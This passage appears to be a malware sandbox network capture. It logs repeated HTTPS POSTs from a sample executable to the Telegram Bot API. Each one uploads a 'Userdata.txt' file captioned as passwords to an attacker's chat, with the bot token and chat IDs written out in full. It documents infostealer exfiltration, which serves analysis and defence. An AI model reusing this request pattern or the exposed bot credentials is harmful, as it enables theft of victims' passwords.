                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33b5145197d2
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 35 31 34 35 31 39 37 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33b5145197d2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:47 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:47 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:47 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43786,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576687,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.450056149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:48 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33cf2e35ee98
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 66 32 65 33 35 65 65 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33cf2e35ee98Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:49 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:48 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:49 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43787,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576688,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.450058149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:50 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33e3ffe66eb3
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 33 66 66 65 36 36 65 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33e3ffe66eb3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:50 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:50 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:50 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43788,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576690,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.450060149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:51 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33fb59f8d8ed
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 62 35 39 66 38 64 38 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33fb59f8d8edContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:52 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:52 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:52 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43789,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576692,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.450062149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:53 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd341919464094
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 39 31 39 34 36 34 30 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd341919464094Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:54 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:54 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:54 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43790,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576694,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.450064149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:55 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd34357477f033
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 35 37 34 37 37 66 30 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd34357477f033Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:56 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:56 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:56 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43791,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576696,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.450066149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:58 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd34663c8145e3
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 36 36 33 63 38 31 34 35 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd34663c8145e3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:58 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:58 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:58 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43792,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576698,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.450068149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:59 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd347fcfb3bfa5
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
